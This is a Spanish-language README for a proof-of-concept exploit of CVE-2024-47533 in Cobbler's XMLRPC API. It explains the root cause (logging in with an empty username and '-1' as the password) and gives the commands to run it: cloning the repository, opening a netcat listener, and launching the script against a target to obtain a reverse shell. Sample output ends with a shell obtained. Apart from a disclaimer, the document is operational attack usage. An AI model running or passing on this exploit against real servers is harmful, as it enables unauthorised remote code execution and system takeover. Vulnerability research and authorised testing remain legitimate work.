
Prueba de concepto de explotación para CVE-2024-47533, una omisión de autenticación no autenticada en la API XMLRPC de Cobbler que conduce a la ejecución remota de código mediante una shell inversa inyectada.
Este repositorio contiene un Exploit de Prueba de Concepto (PoC) para CVE-2024-47533,
una omisión crítica de autenticación en la API XMLRPC de Cobbler que conduce a ejecución remota de código (RCE) sin autenticación.
El exploit aprovecha la falla en el método login() de la API XMLRPC para eludir la autenticación e inyectar un comando de reverse shell a través de background_import().
Esta herramienta está destinada únicamente a fines educativos, de investigación y pruebas de penetración autorizadas.
NO la utilice en sistemas que no sean de su propiedad o para los cuales no tenga permiso explícito por escrito.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados.
Causa Raíz:
utils.get_shared_secret() devuelve incorrectamente -1 debido a un mal manejo de la lectura de archivos en modo binario con una codificación, lo que permite la autenticación con un nombre de usuario vacío y -1 como contraseña.
Impacto:
Un atacante puede:
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
En su máquina atacante:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
Ejemplo:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # Script de exploit de reverse shell
└── README.md # Documentación
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Conectando a Cobbler...
[*] Autenticando...
[*] Ejecutando exploit...
[+] ¡Exploit enviado! Shell obtenida 🔥.
00xCanelo
Perfil de GitHub